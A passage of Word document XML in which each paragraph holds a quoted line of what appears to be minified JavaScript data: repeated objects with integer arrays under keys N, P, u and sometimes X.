    <w:p w14:paraId="635AC6CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C890EB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210692CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A4972" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2049C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BADC9D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE48E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FA5E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC5C8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77213A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47429B04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141C67D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336881AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43A2A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC32A6B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F3797" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22448B47" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9FDA17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E8025" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06D27A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 12, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C54D4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132E7DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5531D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [7, 9, 10, 11, 14, 17, 18, 19, 22, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 40, 41, 42, 43, 44],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16824CDD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 6, 8, 12, 13, 15, 16, 20, 21, 23, 24, 25, 39, 126, 137, 159, 248, 281, 284, 301, 311, 317, 350, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB8AA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92C1A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C26D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A7E9D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA82094" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6BBEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1393B3F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 5, 1, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AACF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B798094" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [33, 83, 177, 184, 199, 300, 302, 321, 336, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F467E3C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E65C725" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195C051" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFB03B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [68, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541881E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B624A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40368AA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0771CD03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 14, 17, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2A33D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD2903" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB275E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5811FB5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E52428" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8F8A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5834F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51C87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5472B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C179C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716969AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740846B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 13, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8E13A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 159, 186, 317, 338]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193DB08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046B020" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DF9CF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17953AF9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53041F5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60347333" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573456C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF0DAD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07604F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 18, 21, 22, 23, 24, 33, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206B57A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066CF00D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C41D766" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F13222" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D002B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C45D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4130293D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAAE4CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 4, 10, 13, 14, 18, 20, 25, 26, 89, 128, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A184592" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031B566" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E08EF35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDA655" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773023D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7229C58F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478CF244" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536E32A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B5682C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A3661" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4EB45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2B392" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FCB77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D95DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7AD5B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64A6B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5BA168" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024BC2BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A89BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B027FD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF085C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220A688" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A1AC04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A50CB8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389DBF9B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CC7FEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E540F59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DD8CEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 16, 5, 11, 24, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373E712" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10744CE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [89, 124, 128, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B6BF3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D35D06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A4B587" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4C9BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 28]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C65BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE75309" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169382B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C906D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D9862" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AABF24C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B097B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68276C2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6DF8E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F29334" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79061132" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEAD29" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD603CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5C4D00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02D311" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367F363" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [40, 330]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1105B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D4269" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B97756" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23D2C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [33, 83, 184, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72598FB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
